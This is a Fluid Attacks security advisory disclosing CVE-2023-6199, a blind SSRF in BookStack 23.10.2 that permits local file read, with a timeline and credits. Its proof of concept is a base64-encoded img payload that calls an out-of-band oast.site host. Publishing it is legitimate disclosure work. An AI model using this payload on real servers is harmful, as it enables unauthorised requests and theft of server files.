---
slug: advisories/imagination/
title: Book Stack v23.10.2 - LFR via Blind SSRF
authors: Carlos Bello
writer: cbello
codename: imagination
product: Book Stack v23.10.2 - LFR via Blind SSRF
date: 2023-11-20 12:00 COT
cveid: CVE-2023-6199
severity: 7.1
description: Book Stack v23.10.2 - Local File Read via Blind SSRF
keywords: Fluid Attacks, Security, Vulnerabilities, LFR, SSRF, Book Stack, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="Book Stack v23.10.2 - LFR via Blind SSRF"
    code="[Imagination](https://en.wikipedia.org/wiki/Imagination_(band))"
    product="Book Stack"
    affected-versions="Version 23.10.2"
    fixed-versions=""
    state="Public"
    release="2023-11-20">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Server-side request forgery (SSRF)"
    rule="[100. Server-side request forgery (SSRF)](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-100/)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"
    score="7.1"
    available="No"
    id="[CVE-2023-6199](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6199)">
</vulnerability-table>

## Description

Book Stack version 23.10.2 allows filtering local files on the server.
This is possible because the application is vulnerable to SSRF.

## Vulnerability

A server-side request forgery (SSRF) vulnerability has been identified
in Book Stack that, under certain conditions, could allow an attacker to
obtain local files from the server. The attacker must have writer permissions.

## POC

```html
<!--
    1. OOB

    interactsh-client -v
    => clc2nf2q8vb4audkj6ngndxkxg7c7y1pj.oast.site

    2. Craft Payload

    https://clc2nf2q8vb4audkj6ngndxkxg7c7y1pj.oast.site/image.png | base64
    => aHR0cHM6Ly9jbGMybmYycTh2YjRhdWRrajZuZ25keGt4ZzdjN3kxcGoub2FzdC5zaXRlL2ltYWdlLnBuZw

    3. Exploit

    => <img src='data:image/png;base64,[BASE64 HERE]'/>
-->
<img src='data:image/png;base64,aHR0cHM6Ly9jbGMybmYycTh2YjRhdWRrajZuZ25keGt4ZzdjN3kxcGoub2FzdC5zaXRlL2ltYWdlLnBuZw'/>
```

## Evidence of exploitation

<iframe src="https://tinyurl.com/3sza5w52"
width="835" height="504" frameborder="0" title="SSRF-BookStack-23.10.2"
webkitallowfullscreen mozallowfullscreen allowfullscreen controls
loading="lazy"></iframe>

## Our security policy

We have reserved the ID CVE-2023-6199 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Book Stack 23.10.2

* Operating System: MacOS

## Mitigation

An updated version of BookStack is available at the vendor page.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://github.com/BookStackApp/BookStack/>

**BookStack release** <https://www.bookstackapp.com/blog/bookstack-release-v23-10-3/>

## Timeline

<time-lapse
  discovered="2023-11-17"
  contacted="2023-11-18"
  replied="2023-11-19"
  confirmed="2023-11-19"
  patched="2023-11-20"
  disclosure="2023-11-20">
</time-lapse>
